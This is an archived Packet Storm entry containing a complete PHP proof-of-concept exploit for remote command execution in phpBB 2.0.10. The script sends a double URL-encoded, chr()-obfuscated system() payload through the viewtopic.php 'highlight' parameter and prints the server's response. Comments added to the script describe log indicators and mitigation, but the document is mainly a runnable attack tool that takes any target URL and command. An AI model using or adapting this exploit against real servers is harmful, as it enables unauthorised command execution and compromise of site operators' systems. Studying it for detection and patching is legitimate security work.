phpbb.php.txt

2004-11-20T00:00:00
ID PACKETSTORM:35107
Type packetstorm
Reporter Pokleyzz
Modified 2004-11-20T00:00:00

Description

                                        
                                            `#!/usr/bin/php -q  
<?php  
/*  
# phpBB 2.0.10 execute command by pokleyzz <pokleyzz at scan-associates.net>  
# 15th November 2004 : 4:04 a.m  
#  
# bug found by How Dark (http://www.howdark.com) (1st October 2004)  
#  
# Requirement:  
#  
# PHP 4.x with curl extension;  
#  
# ** Selamat Hari Raya **  
*/  
  
// Command-line driver of this proof-of-concept: it reads its arguments, builds
// a single GET request for viewtopic.php and prints whatever the server returns.
// Reading it as a defender: the only unusual part of the request is the
// `highlight` query parameter, so that parameter is what to search for in
// web-server access logs and what a request filter should inspect.

// Stop early when the curl extension is absent; every request call below needs it.
if (!(function_exists('curl_init'))) {
echo "cURL extension required\n";
exit;
}

// A URL and a command are both required; the test is on the second argument
// only, and the usage text is printed when it is missing or falsy.
if ($argv[2]){
$url = $argv[1];
$command = $argv[2];
}
else {
echo "Usage: ".$argv[0]." <URL> <command> [topic id] [proxy]\n\n";
echo "\tURL\t URL to phpnBB site (ex: http://127.0.0.1/html)\n";
echo "\tcommand\t command to execute on server (ex: 'ls -la')\n";
echo "\ttopic_id\t topic id\n";
echo "\tproxy\t optional proxy url (ex: http://10.10.10.10:8080)\n";
exit;
}
// Optional third argument: the topic id placed in `t=`; it defaults to 1.
if ($argv[3])
$topic = $argv[3];
else
$topic = 1;

// Optional fourth argument: a proxy URL. $proxy stays undefined when it is
// omitted, so the later `if ($proxy)` test reads an unset variable.
if ($argv[4])
$proxy = $argv[4];


// str2chr() (defined further down in this file) rewrites the command as a chain
// of chr(N) calls, so the command text itself adds no quote characters to the URL.
$cmd = str2chr($command);

// The query string is double URL-encoded: `%25` is an encoded `%`, so `%2527`
// becomes `%27` after one decode and `'` after a second, and `%252e` becomes `.`
// in the same way. After two decodes the highlight value is a system(...) call
// wrapped in quote-and-dot pairs.
// NOTE(review): the vulnerable server-side code is not on this page; the payload
// shape implies the highlight value is decoded a second time and then evaluated
// as PHP - confirm against the vendor advisory for phpBB 2.0.10.
// Detection: a viewtopic.php request whose highlight value contains `%2527`,
// `%252e`, `system(` or `chr(` is a strong indicator; ordinary search-term
// highlighting has no reason to carry double-encoded quotes.
// Mitigation: move off the affected release named in the header (2.0.10) to the
// vendor's fixed version (not stated on this page) and review logs for the
// pattern above.
$action = "/viewtopic.php?t=$topic&highlight=%2527%252esystem(".$cmd." )%252e%2527";
$ch=curl_init();
if ($proxy){
curl_setopt($ch, CURLOPT_PROXY,$proxy);
}
curl_setopt($ch, CURLOPT_URL,$url.$action);
// RETURNTRANSFER makes curl_exec() hand the response body back as a string.
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
// No timeout is set and the result is not checked: on a transfer failure
// curl_exec() returns false and the echo below prints nothing.
$res=curl_exec ($ch);
curl_close ($ch);
// The response body is written to the terminal exactly as received.
echo $res;
  
/**
 * Rewrite a string as a chain of chr() calls, one per byte, joined by `%252e`.
 *
 * `%252e` is a double URL-encoded `.`, so after two decodes the result reads as
 * a PHP concatenation of chr(N) terms. For log review this means the command
 * never appears in clear text in the request line: look for runs of
 * `chr(<number>)` separated by `%252e` (or `%2e` / `.` if the log stores a
 * decoded URL) rather than for command names.
 *
 * @param string $str Text to encode; each byte is converted with ord().
 * @return string The encoded chain. For an empty $str the loop never runs and
 *                the never-assigned $chr is returned.
 */
function str2chr($str){

// $chr is not initialised before the first `.=`; the code relies on PHP
// treating the unset variable as an empty string.
for($i = 0;$i < strlen($str);$i++){
// $str{$i} is the legacy curly-brace string offset, consistent with the
// PHP 4.x requirement stated in the file header.
$chr .= "chr(".ord($str{$i}).")";
// Add the encoded `.` separator after every term except the last one.
if ($i != strlen($str) -1)
$chr .= "%252e"; 
}
return $chr;
}
?>`